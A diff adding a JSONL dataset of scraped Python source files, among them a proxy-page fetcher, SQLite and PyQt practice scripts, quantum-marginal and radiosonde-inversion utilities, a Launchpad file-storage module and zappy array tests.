diff --git "a/4717.jsonl" "b/4717.jsonl" new file mode 100644--- /dev/null +++ "b/4717.jsonl" @@ -0,0 +1,1012 @@ +{"seq_id":"74613601473","text":"import requests\r\nfrom pyquery import PyQuery as pq\r\n\r\ndef get_goubanjia(url):\r\n headers = {\r\n \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\"\r\n }\r\n response = requests.get(url,headers=headers)\r\n text = response.content.decode(\"utf-8\")\r\n html = pq(text)\r\n return html\r\n","repo_name":"guguji12345/ProxyPool","sub_path":"proxypool/get_goubanjia_html.py","file_name":"get_goubanjia_html.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38561659934","text":"import sqlite3\n\nconn = sqlite3.connect(\"arda.db\")\nc = conn.cursor()\n\n\nmany_customers = [('Was', 'Sas', 'bus'), ('deym', 'geym', 'beym')]\n\nc.execute(\"\"\"CREATE TABLE IF NOT EXISTS kisiler(\n firstName text,\n lastName text,\n email text\n)\"\"\")\nc.execute(\"\"\"INSERT INTO kisiler VALUES('Arda','Kilinc','arda.com')\"\"\")\n\n#c.executemany(\"\"\"INSERT INTO kisiler VALUES(?,?,?)\"\"\",many_customers)\n\nconn.commit() # commit edilmezse execute çalışmaz\nconn.close()\n","repo_name":"adraarda23/sqlpracticefornewbies","sub_path":"sqlpractice1.py","file_name":"sqlpractice1.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20072098396","text":"from PyQt5.QtWidgets import * # *代表所有的class\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nfrom mainwindow1 import Ui_Dialog\nimport sys\n\ndef clicked_hi():\n message = QMessageBox()\n x = ui.lineEdit.text()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(x)\n message.exec_()\n ui.progressBar.setValue(90)\n\ndef clicked_hello():\n ui.label.setText = \"Hello\"\n print(\"Hello\")\n ui.progressBar.setValue(40)\n\ndef pic_click(event):\n message = QMessageBox()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(\"你按了圖片!!\")\n message.exec_()\n \ndef slider_change():\n x = ui.horizontalSlider.value()\n print(f\"change it is : {x}\")\n\ndef slider_release():\n message = QMessageBox()\n message.setWindowTitle(\"surprice\")\n message.setInformativeText(\"你選擇的是!! 
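# --- Editor's illustration (not part of the dataset records above) ---
# The sqlite3 record above leaves executemany() commented out and notes, in
# Turkish, "commit edilmezse execute çalışmaz" (roughly: without commit(), the
# executed statements do not take effect). A minimal self-contained sketch of
# both points, using an in-memory database so it is safe to run anywhere:
import sqlite3

many_customers = [('Was', 'Sas', 'bus'), ('deym', 'geym', 'beym')]

conn = sqlite3.connect(":memory:")
with conn:  # the connection context manager commits on success, rolls back on error
    conn.execute("""CREATE TABLE IF NOT EXISTS kisiler(
        firstName text,
        lastName text,
        email text
    )""")
    # executemany() binds one parameter tuple per inserted row
    conn.executemany("INSERT INTO kisiler VALUES(?,?,?)", many_customers)

print(conn.execute("SELECT COUNT(*) FROM kisiler").fetchone()[0])  # -> 2
conn.close()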
\"+str(ui.horizontalSlider.value()))\n message.exec_()\napp = QApplication(sys.argv)\nwidget = QWidget()\nui = Ui_Dialog()\nui.setupUi(widget)\n\nui.progressBar.setMaximum(100)\nui.progressBar.setMinimum(0)\nui.progressBar.setValue(3)\nui.horizontalSlider.setMaximum(110)\nui.horizontalSlider.setMinimum(-3)\nui.horizontalSlider.valueChanged.connect(slider_change)\nui.horizontalSlider.sliderReleased.connect(slider_release)\n\n\nui.Test.clicked.connect(clicked_hi)\nui.helloButton.clicked.connect(clicked_hello)\nui.pic.mouseReleaseEvent = pic_click\n\nwidget.show()\napp.exec_()","repo_name":"lin880005/qt_test","sub_path":"test_2.py","file_name":"test_2.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37511126295","text":"\"\"\"\nImplementation of Zhang's Bell measurement to obtain\nall k-qubit RDM information\n\"\"\"\nfrom itertools import product\nfrom itertools import combinations\nfrom collections import defaultdict\n\nimport numpy as np\nimport cirq\n\n\ndef qubit_marginal_op_basis(marginal_rank, qubits):\n \"\"\"\n Generate operator basis for the k-qubit marginals\n\n :param marginal_rank: 1-qubit marginals, 2-qubit marginals etc.\n :param qubits: list of Qid objects\n :return:\n \"\"\"\n qubit_type = {0: cirq.I, 1: 'X', 2: 'Y', 3: 'Z'}\n qubit_sets = defaultdict(list)\n n_qubits = len(qubits)\n for qs in combinations(range(n_qubits), marginal_rank):\n qs_sorted = tuple(sorted([qubits[qq] for qq in qs]))\n # Construct pauli operator basis for this subset of qubits\n # {I, X, Y, Z}^{|q-subset|}\n for pauli_term_per_qubit in product(range(4), repeat=len(qs)):\n paulistring = dict([(qubits[qs[qidx]], qubit_type[pauli_type]) for qidx, pauli_type in enumerate(pauli_term_per_qubit)])\n qubit_sets[qs_sorted].append(cirq.PauliString(paulistring))\n\n return qubit_sets\n\n\ndef get_qubit_marginals_cirq(state, qubits, qubit_marginal_rank):\n \"\"\"\n Calculate the qubit marginals for a state using cirq's marginalization\n routines\n\n :param state:\n :param n_qubits:\n :return:\n \"\"\"\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = {}\n for key, val in qubit_marginal_basis.items():\n rho_true = cirq.density_matrix_from_state_vector(state_vector=state,\n indices=[kk._x for kk in\n key])\n marginal_dict[key] = rho_true\n return marginal_dict\n\n\ndef get_qubit_marginals(state, qubits, qubit_marginal_rank) -> dict:\n \"\"\"\n Calculate the qubit marginals for a state\n\n :param state: state vector\n :param n_qubits: total number of qubits\n :param qubit_marginal_rank: rank of marginal to calculate\n :return: dictionary where key is subset of qubits and value is marginal\n density matrix\n \"\"\"\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = {}\n for key, val in qubit_marginal_basis.items():\n rho = np.zeros((2**len(key), 2**len(key)), dtype=np.complex128)\n for pterm in val:\n pauli_op_mat = cirq.unitary(cirq.Circuit([cirq.I(xx) for xx in qubits] + [pterm]))\n test_pauli_expect = (state.conj().T @ pauli_op_mat @ state).real\n pauli_op_mat_marginal = cirq.unitary(cirq.Circuit([cirq.I(xx) for xx in key] + [pterm]))\n rho += test_pauli_expect * pauli_op_mat_marginal / 2**len(key)\n marginal_dict[key] = rho\n return marginal_dict\n\n\ndef get_qubit_marginal_expectations(state, qubits, qubit_marginal_rank) -> dict:\n \"\"\"\n Calculate the qubit marginals for a state\n\n :param state: state vector\n 
:param n_qubits: total number of qubits\n :param qubit_marginal_rank: rank of marginal to calculate\n :return: dictionary where key is subset of qubits and value a dictionary\n with keys as cirq.PauliString (P) and value as \n \"\"\"\n qubit_map = dict(zip(qubits, range(len(qubits))))\n qubit_marginal_basis = qubit_marginal_op_basis(qubit_marginal_rank, qubits)\n marginal_dict = defaultdict(dict)\n for key, val in qubit_marginal_basis.items():\n for pterm in val:\n marginal_dict[key][pterm] = pterm.expectation_from_state_vector(state, qubit_map=qubit_map).real\n return marginal_dict\n","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/qubit_measurement/qubit_marginal_ops.py","file_name":"qubit_marginal_ops.py","file_ext":"py","file_size_in_byte":3623,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"36916638922","text":"\nimport numpy as np\n\nclass Layer: #class to store a compressed layer from radiosonde\n \n def __init__(self,z_bottom,z_top,T_bottom,T_top,slope,intercept):\n self.z_bottom = z_bottom #layer bottom height\n self.z_top = z_top #layer top height\n self.T_bottom = T_bottom #temperature at layer bottom\n self.T_top = T_top #temperature at layer top\n self.slope = slope #slope of the compressed layer linear fit\n self.intercept = intercept #intercept point of the compressed layer linear fit\n \nclass Inversion: #class to store temperature inversion information\n\n def __init__(self,inv_bottom,inv_top,temp_bottom,temp_top,layer):\n self.inv_bottom = inv_bottom #inversion bottom\n self.inv_top = inv_top #inversion top\n self.temp_bottom = temp_bottom #temperature at the inversion bottom\n self.temp_top = temp_top #temperature at the inversion top\n self.layer = layer #elevated or surface based inversion\n \ndef layer_fitting(z,T,error):\n\n def layer_fit(z,T,beg,end,error):\n\n def temp_fit(x,y):\n p = np.polyfit(np.array([x[0],x[x.size-1]]),np.array([y[0],y[y.size-1]]),1)\n y_fit = np.poly1d(p)(x)\n e_fit = np.linalg.norm(y_fit-y)\n return e_fit,p\n \n e = 1\n l = end+1\n while e >= error and l-beg > 1:\n l -= 1\n e,p = temp_fit(z[beg:l+1],T[beg:l+1])\n return p,l\n \n layers = []\n# z = z[~np.isnan(T)] #removing nans\n# T = T[~np.isnan(T)] #removing nans\n beg = 0\n end = z.size-1\n while end-beg >= 1:\n z_bottom = z[beg]\n T_bottom = T[beg]\n poly,beg = layer_fit(z,T,beg,end,error) #beg is now the returned endpoint\n z_top = z[beg]\n T_top = T[beg]\n slope = poly[0]\n intercept = poly[1]\n layer = Layer(z_bottom,z_top,T_bottom,T_top,slope,intercept)\n layers.append(layer)\n return layers\n \ndef get_inversions(layers):\n \n inversions = []\n n = 0\n m = 1\n for i in range(0,len(layers)-1):\n if np.sign(layers[i].slope) == -1:\n n = n + 1\n if np.sign(layers[i].slope) == 1 and np.sign(layers[i+1].slope) == -1:\n inv_bottom = layers[n].z_bottom\n inv_top = layers[i].z_top\n temp_bottom = layers[n].T_bottom\n temp_top = layers[i].T_top\n if n == 0:\n layer = 'surfased based inversion'\n else:\n layer = 'elevated inversion ' + str(m)\n m += 1\n n = i + 1\n inversion = Inversion(inv_bottom,inv_top,temp_bottom,temp_top,layer)\n inversions.append(inversion)\n return inversions\n\ndef ntom(n,y,a):\n return n*(y/a+1)\n\ndef Nton(N):\n return N * 10e-6 + 1\n\ndef kfunc(y,n):\n return 
np.gradient(np.log(n),y)","repo_name":"dkllrjr/PyKeller","sub_path":"atmos_sci/gpsro.py","file_name":"gpsro.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32272703616","text":"from aquilon.exceptions_ import ArgumentError\nfrom aquilon.aqdb.model import (Machine, ServiceMap, PersonalityServiceMap,\n DnsDomain)\nfrom aquilon.worker.broker import BrokerCommand # pylint: disable=W0611\nfrom aquilon.worker.dbwrappers.location import get_location\nfrom aquilon.worker.processes import DSDBRunner\nfrom aquilon.worker.templates.machine import PlenaryMachineInfo\nfrom aquilon.worker.templates.base import PlenaryCollection\n\n\n# based on update_rack\nclass CommandUpdateBuilding(BrokerCommand):\n\n required_parameters = [\"building\"]\n\n def render(self, session, logger, building, city, address,\n fullname, default_dns_domain, comments, **arguments):\n dbbuilding = get_location(session, building=building)\n\n old_city = dbbuilding.city\n\n dsdb_runner = DSDBRunner(logger=logger)\n\n if address is not None:\n old_address = dbbuilding.address\n dbbuilding.address = address\n dsdb_runner.update_building(dbbuilding.name, dbbuilding.address,\n old_address)\n if fullname is not None:\n dbbuilding.fullname = fullname\n if comments is not None:\n dbbuilding.comments = comments\n if default_dns_domain is not None:\n if default_dns_domain:\n dbdns_domain = DnsDomain.get_unique(session, default_dns_domain,\n compel=True)\n dbbuilding.default_dns_domain = dbdns_domain\n else:\n dbbuilding.default_dns_domain = None\n\n plenaries = PlenaryCollection(logger=logger)\n if city:\n dbcity = get_location(session, city=city)\n\n # This one would change the template's locations hence forbidden\n if dbcity.hub != dbbuilding.hub:\n # Doing this both to reduce user error and to limit\n # testing required.\n raise ArgumentError(\"Cannot change hubs. 
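# --- Editor's illustration (not part of the dataset records above) ---
# layer_fitting() in the gpsro.py record grows a radiosonde segment until the
# straight line through its two endpoints no longer matches the profile to
# within `error`. A standalone sketch of that endpoint-fit test; the function
# name and the toy temperature profile below are illustrative, not from the
# original module:
import numpy as np

def endpoint_fit_error(z, T):
    """Fit a line through (z[0], T[0]) and (z[-1], T[-1]); return residual norm."""
    p = np.polyfit(np.array([z[0], z[-1]]), np.array([T[0], T[-1]]), 1)
    return np.linalg.norm(np.poly1d(p)(z) - T), p

z = np.linspace(0.0, 1000.0, 11)                  # heights in metres
T = 15.0 - 0.0065 * z + 0.2 * np.sin(z / 100.0)   # toy temperature profile
err, coeffs = endpoint_fit_error(z, T)
print(f"slope={coeffs[0]:.5f} K/m, residual norm={err:.3f} K")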
{0} is in {1} \"\n \"while {2} is in {3}.\".format(\n dbcity, dbcity.hub,\n dbbuilding, dbbuilding.hub))\n\n # issue svcmap warnings\n maps = 0\n for map_type in [ServiceMap, PersonalityServiceMap]:\n maps = maps + session.query(map_type).\\\n filter_by(location=old_city).count()\n\n if maps > 0:\n logger.client_info(\"There are {0} service(s) mapped to the \"\n \"old location of the ({1:l}), please \"\n \"review and manually update mappings for \"\n \"the new location as needed.\".format(\n maps, dbbuilding.city))\n\n dbbuilding.update_parent(parent=dbcity)\n\n if old_city.campus and (old_city.campus != dbcity.campus):\n dsdb_runner.del_campus_building(old_city.campus, building)\n\n if dbcity.campus and (old_city.campus != dbcity.campus):\n dsdb_runner.add_campus_building(dbcity.campus, building)\n\n query = session.query(Machine)\n query = query.filter(Machine.location_id.in_(dbcity.offspring_ids()))\n\n for dbmachine in query:\n plenaries.append(PlenaryMachineInfo(dbmachine, logger=logger))\n\n session.flush()\n\n if plenaries.plenaries:\n with plenaries.get_write_key() as key:\n plenaries.stash()\n try:\n plenaries.write(locked=True)\n dsdb_runner.commit_or_rollback()\n except:\n plenaries.restore_stash()\n else:\n dsdb_runner.commit_or_rollback()\n\n return\n","repo_name":"gombasg/aquilon","sub_path":"lib/python2.6/aquilon/worker/commands/update_building.py","file_name":"update_building.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"36040796374","text":"__metaclass__ = type\n\nimport errno\nimport hashlib\nimport os\nimport shutil\nimport tempfile\n\nfrom lp.registry.model.product import Product\nfrom lp.services.config import dbconfig\nfrom lp.services.database import write_transaction\nfrom lp.services.database.interfaces import IStore\nfrom lp.services.database.postgresql import ConnectionString\n\n\n__all__ = [\n 'DigestMismatchError',\n 'LibrarianStorage',\n 'LibraryFileUpload',\n 'DuplicateFileIDError',\n 'WrongDatabaseError',\n # _relFileLocation needed by other modules in this package.\n # Listed here to keep the import fascist happy\n '_relFileLocation',\n '_sameFile',\n ]\n\n\nclass DigestMismatchError(Exception):\n \"\"\"The given digest doesn't match the SHA-1 digest of the file.\"\"\"\n\n\nclass DuplicateFileIDError(Exception):\n \"\"\"Given File ID already exists.\"\"\"\n\n\nclass WrongDatabaseError(Exception):\n \"\"\"The client's database name doesn't match our database.\"\"\"\n\n def __init__(self, clientDatabaseName, serverDatabaseName):\n Exception.__init__(self, clientDatabaseName, serverDatabaseName)\n self.clientDatabaseName = clientDatabaseName\n self.serverDatabaseName = serverDatabaseName\n\n\nclass LibrarianStorage:\n \"\"\"Blob storage.\n\n This manages the actual storage of files on disk and the record of those\n in the database; it has nothing to do with the network interface to those\n files.\n \"\"\"\n\n def __init__(self, directory, library):\n self.directory = directory\n self.library = library\n self.incoming = os.path.join(self.directory, 'incoming')\n try:\n os.mkdir(self.incoming)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n def hasFile(self, fileid):\n return os.access(self._fileLocation(fileid), os.F_OK)\n\n def _fileLocation(self, fileid):\n return os.path.join(self.directory, _relFileLocation(str(fileid)))\n\n def startAddFile(self, filename, size):\n return LibraryFileUpload(self, filename, size)\n\n def getFileAlias(self, 
aliasid, token, path):\n return self.library.getAlias(aliasid, token, path)\n\n\nclass LibraryFileUpload(object):\n \"\"\"A file upload from a client.\"\"\"\n srcDigest = None\n mimetype = 'unknown/unknown'\n contentID = None\n aliasID = None\n expires = None\n databaseName = None\n debugID = None\n\n def __init__(self, storage, filename, size):\n self.storage = storage\n self.filename = filename\n self.size = size\n self.debugLog = []\n\n # Create temporary file\n tmpfile, tmpfilepath = tempfile.mkstemp(dir=self.storage.incoming)\n self.tmpfile = os.fdopen(tmpfile, 'w')\n self.tmpfilepath = tmpfilepath\n self.md5_digester = hashlib.md5()\n self.sha1_digester = hashlib.sha1()\n self.sha256_digester = hashlib.sha256()\n\n def append(self, data):\n self.tmpfile.write(data)\n self.md5_digester.update(data)\n self.sha1_digester.update(data)\n self.sha256_digester.update(data)\n\n @write_transaction\n def store(self):\n self.debugLog.append('storing %r, size %r'\n % (self.filename, self.size))\n self.tmpfile.close()\n\n # Verify the digest matches what the client sent us\n dstDigest = self.sha1_digester.hexdigest()\n if self.srcDigest is not None and dstDigest != self.srcDigest:\n # XXX: Andrew Bennetts 2004-09-20: Write test that checks that\n # the file really is removed or renamed, and can't possibly be\n # left in limbo\n os.remove(self.tmpfilepath)\n raise DigestMismatchError(self.srcDigest, dstDigest)\n\n try:\n # If the client told us the name of the database it's using,\n # check that it matches.\n if self.databaseName is not None:\n # Per Bug #840068, there are two methods of getting the\n # database name (connection string and db\n # introspection), and they can give different results\n # due to pgbouncer database aliases. Lets check both,\n # and succeed if either matches.\n config_dbname = ConnectionString(\n dbconfig.rw_main_master).dbname\n\n result = IStore(Product).execute(\"SELECT current_database()\")\n real_dbname = result.get_one()[0]\n if self.databaseName not in (config_dbname, real_dbname):\n raise WrongDatabaseError(\n self.databaseName, (config_dbname, real_dbname))\n\n self.debugLog.append(\n 'database name %r ok' % (self.databaseName, ))\n # If we haven't got a contentID, we need to create one and return\n # it to the client.\n if self.contentID is None:\n contentID = self.storage.library.add(\n dstDigest, self.size, self.md5_digester.hexdigest(),\n self.sha256_digester.hexdigest())\n aliasID = self.storage.library.addAlias(\n contentID, self.filename, self.mimetype, self.expires)\n self.debugLog.append('created contentID: %r, aliasID: %r.'\n % (contentID, aliasID))\n else:\n contentID = self.contentID\n aliasID = None\n self.debugLog.append('received contentID: %r' % (contentID, ))\n\n except:\n # Abort transaction and re-raise\n self.debugLog.append('failed to get contentID/aliasID, aborting')\n raise\n\n # Move file to final location\n try:\n self._move(contentID)\n except:\n # Abort DB transaction\n self.debugLog.append('failed to move file, aborting')\n\n # Remove file\n os.remove(self.tmpfilepath)\n\n # Re-raise\n raise\n\n # Commit any DB changes\n self.debugLog.append('committed')\n\n # Return the IDs if we created them, or None otherwise\n return contentID, aliasID\n\n def _move(self, fileID):\n location = self.storage._fileLocation(fileID)\n if os.path.exists(location):\n raise DuplicateFileIDError(fileID)\n try:\n os.makedirs(os.path.dirname(location))\n except OSError as e:\n # If the directory already exists, that's ok.\n if e.errno != errno.EEXIST:\n 
raise\n shutil.move(self.tmpfilepath, location)\n\n\ndef _sameFile(path1, path2):\n file1 = open(path1, 'rb')\n file2 = open(path2, 'rb')\n\n blk = 1024 * 64\n chunksIter = iter(lambda: (file1.read(blk), file2.read(blk)), ('', ''))\n for chunk1, chunk2 in chunksIter:\n if chunk1 != chunk2:\n return False\n return True\n\n\ndef _relFileLocation(file_id):\n \"\"\"Return the relative location for the given file_id.\n\n The relative location is obtained by converting file_id into a 8-digit hex\n and then splitting it across four path segments.\n \"\"\"\n h = \"%08x\" % int(file_id)\n return '%s/%s/%s/%s' % (h[:2], h[2:4], h[4:6], h[6:])\n","repo_name":"abramhindle/UnnaturalCodeFork","sub_path":"python/testdata/launchpad/lib/lp/services/librarianserver/storage.py","file_name":"storage.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34130245456","text":"import concurrent.futures\nimport logging\nimport pytest\nimport sys\nimport numpy as np\nimport zappy.executor\nimport zappy.direct\nimport zappy.spark\nimport zarr\n\nfrom numpy.testing import assert_allclose\nfrom pyspark.sql import SparkSession\n\n# add/change to \"pywren_ndarray\" to run the tests using Pywren (requires Pywren to be installed)\nTESTS = [\n \"direct_ndarray\",\n \"direct_zarr\",\n \"executor_ndarray\",\n \"executor_zarr\",\n \"spark_ndarray\",\n \"spark_zarr\",\n]\n\n# only run Beam tests on Python 2, and don't run executor tests\nif sys.version_info[0] == 2:\n import apache_beam as beam\n from apache_beam.options.pipeline_options import PipelineOptions\n import zappy.beam\n\n TESTS = [\n \"direct_ndarray\",\n \"direct_zarr\",\n \"spark_ndarray\",\n \"spark_zarr\",\n \"beam_ndarray\",\n \"beam_zarr\",\n ]\n\n\nclass TestZappyArray:\n @pytest.fixture()\n def x(self):\n return np.array(\n [\n [0.0, 1.0, 0.0, 3.0, 0.0],\n [2.0, 0.0, 3.0, 4.0, 5.0],\n [4.0, 0.0, 0.0, 6.0, 7.0],\n ]\n )\n\n @pytest.fixture()\n def chunks(self):\n return (2, 5)\n\n @pytest.fixture()\n def xz(self, x, chunks, tmpdir):\n input_file_zarr = str(tmpdir.join(\"x.zarr\"))\n z = zarr.open(\n input_file_zarr, mode=\"w\", shape=x.shape, dtype=x.dtype, chunks=chunks\n )\n z[:] = x.copy() # write as zarr locally\n return input_file_zarr\n\n @pytest.fixture(scope=\"module\")\n def sc(self):\n logger = logging.getLogger(\"py4j\")\n logger.setLevel(logging.WARN)\n spark = (\n SparkSession.builder.master(\"local[2]\")\n .appName(\"my-local-testing-pyspark-context\")\n .getOrCreate()\n )\n yield spark.sparkContext\n spark.stop()\n\n @pytest.fixture(params=TESTS)\n def xd(self, sc, x, xz, chunks, request):\n if request.param == \"direct_ndarray\":\n yield zappy.direct.from_ndarray(x.copy(), chunks)\n elif request.param == \"direct_zarr\":\n yield zappy.direct.from_zarr(xz)\n elif request.param == \"executor_ndarray\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks)\n elif request.param == \"executor_zarr\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_zarr(executor, xz)\n elif request.param == \"spark_ndarray\":\n yield zappy.spark.from_ndarray(sc, x.copy(), chunks)\n elif request.param == \"spark_zarr\":\n yield zappy.spark.from_zarr(sc, xz)\n elif request.param == \"beam_ndarray\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_ndarray(pipeline, 
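# --- Editor's illustration (not part of the dataset records above) ---
# _relFileLocation() in the librarian storage record shards a numeric file id
# into four two-character path segments, keeping directory fan-out bounded at
# 256 entries per level. The arithmetic below mirrors the record exactly:
def rel_file_location(file_id):
    # 8-digit hex, split across four path segments: ab/cd/ef/gh
    h = "%08x" % int(file_id)
    return "%s/%s/%s/%s" % (h[:2], h[2:4], h[4:6], h[6:])

assert rel_file_location(1) == "00/00/00/01"
assert rel_file_location(0xDEADBEEF) == "de/ad/be/ef"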
x.copy(), chunks)\n elif request.param == \"beam_zarr\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_zarr(pipeline, xz)\n elif request.param == \"pywren_ndarray\":\n executor = zappy.executor.PywrenExecutor()\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks)\n\n @pytest.fixture(params=TESTS)\n def xd_and_temp_store(self, sc, x, xz, chunks, request):\n if request.param == \"direct_ndarray\":\n yield zappy.direct.from_ndarray(x.copy(), chunks), zarr.TempStore()\n elif request.param == \"direct_zarr\":\n yield zappy.direct.from_zarr(xz), zarr.TempStore()\n elif request.param == \"executor_ndarray\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_ndarray(\n executor, x.copy(), chunks\n ), zarr.TempStore()\n elif request.param == \"executor_zarr\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.from_zarr(executor, xz), zarr.TempStore()\n elif request.param == \"spark_ndarray\":\n yield zappy.spark.from_ndarray(sc, x.copy(), chunks), zarr.TempStore()\n elif request.param == \"spark_zarr\":\n yield zappy.spark.from_zarr(sc, xz), zarr.TempStore()\n elif request.param == \"beam_ndarray\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_ndarray(pipeline, x.copy(), chunks), zarr.TempStore()\n elif request.param == \"beam_zarr\":\n pipeline_options = PipelineOptions()\n pipeline = beam.Pipeline(options=pipeline_options)\n yield zappy.beam.from_zarr(pipeline, xz), zarr.TempStore()\n elif request.param == \"pywren_ndarray\":\n import s3fs.mapping\n\n def create_unique_bucket_name(prefix):\n import uuid\n\n return \"%s-%s\" % (prefix, str(uuid.uuid4()).replace(\"-\", \"\"))\n\n s3 = s3fs.S3FileSystem()\n bucket = create_unique_bucket_name(\"zappy-test\")\n s3.mkdir(bucket)\n path = \"%s/%s\" % (bucket, \"test.zarr\")\n s3store = s3fs.mapping.S3Map(path, s3=s3)\n executor = zappy.executor.PywrenExecutor()\n yield zappy.executor.from_ndarray(executor, x.copy(), chunks), s3store\n s3.rm(bucket, recursive=True)\n\n @pytest.fixture(params=[\"direct\", \"executor\", \"spark\"]) # TODO: beam\n def zeros(self, sc, request):\n if request.param == \"direct\":\n yield zappy.direct.zeros((3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"executor\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.zeros(executor, (3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"spark\":\n yield zappy.spark.zeros(sc, (3, 5), chunks=(2, 5), dtype=int)\n\n @pytest.fixture(params=[\"direct\", \"executor\", \"spark\"]) # TODO: beam\n def ones(self, sc, request):\n if request.param == \"direct\":\n yield zappy.direct.ones((3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"executor\":\n with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:\n yield zappy.executor.ones(executor, (3, 5), chunks=(2, 5), dtype=int)\n elif request.param == \"spark\":\n yield zappy.spark.ones(sc, (3, 5), chunks=(2, 5), dtype=int)\n\n def test_identity(self, x, xd):\n assert_allclose(np.asarray(xd), x)\n\n def test_astype(self, x, xd):\n xd = xd.astype(int)\n x = x.astype(int)\n assert xd.dtype == x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_astype_inplace(self, x, xd):\n original_id = id(xd)\n xd = xd.astype(int, copy=False)\n assert original_id == id(xd)\n x = x.astype(int, copy=False)\n assert xd.dtype == 
x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_asarray(self, x, xd):\n assert_allclose(np.asarray(xd), x)\n\n def test_scalar_arithmetic(self, x, xd):\n xd = (((xd + 1) * 2) - 4) / 1.1\n x = (((x + 1) * 2) - 4) / 1.1\n assert_allclose(np.asarray(xd), x)\n\n def test_arithmetic(self, x, xd):\n xd = xd * 2 + xd\n x = x * 2 + x\n assert_allclose(np.asarray(xd), x)\n\n def test_broadcast_row(self, x, xd):\n a = np.array([1.0, 2.0, 3.0, 4.0, 5.0])\n xd = xd + a\n x = x + a\n assert_allclose(np.asarray(xd), x)\n\n def test_broadcast_col(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n a = np.array([[1.0], [2.0], [3.0]])\n xd = xd + a\n x = x + a\n assert_allclose(np.asarray(xd), x)\n\n def test_eq(self, x, xd):\n xd = xd == 0.0\n x = x == 0.0\n assert xd.dtype == x.dtype\n assert_allclose(np.asarray(xd), x)\n\n def test_ne(self, x, xd):\n xd = xd != 0.0\n x = x != 0.0\n assert_allclose(np.asarray(xd), x)\n\n def test_invert(self, x, xd):\n xd = ~(xd == 0.0)\n x = ~(x == 0.0)\n assert_allclose(np.asarray(xd), x)\n\n def test_inplace(self, x, xd):\n original_id = id(xd)\n xd += 1\n assert original_id == id(xd)\n x += 1\n assert_allclose(np.asarray(xd), x)\n\n def test_simple_index(self, x, xd):\n xd = xd[0]\n x = x[0]\n assert_allclose(xd, x)\n\n def test_boolean_index(self, x, xd):\n xd = np.sum(xd, axis=1) # sum rows\n xd = xd[xd > 5]\n x = np.sum(x, axis=1) # sum rows\n x = x[x > 5]\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_cols(self, x, xd):\n xd = xd[:, 1:3]\n x = x[:, 1:3]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_rows(self, x, xd):\n xd = xd[1:3, :]\n x = x[1:3, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_slice_rows_shrink_partitions(self, x, xd):\n if sys.version_info[0] == 2 and isinstance(\n xd, zappy.beam.array.BeamZappyArray\n ): # TODO: fix this\n return\n xd = xd[0:2, :]\n x = x[0:2, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_cols_boolean(self, x, xd):\n subset = np.array([True, False, True, False, True])\n xd = xd[:, subset]\n x = x[:, subset]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_rows_boolean(self, x, xd):\n subset = np.array([True, False, True])\n xd = xd[subset, :]\n x = x[subset, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_cols_int(self, x, xd):\n subset = np.array([1, 3])\n xd = xd[:, subset]\n x = x[:, subset]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_subset_rows_int(self, x, xd):\n subset = np.array([1, 2])\n xd = xd[subset, :]\n x = x[subset, :]\n assert xd.shape == x.shape\n assert_allclose(np.asarray(xd), x)\n\n def test_newaxis(self, x, xd):\n xd = np.sum(xd, axis=1)[:, np.newaxis]\n x = np.sum(x, axis=1)[:, np.newaxis]\n 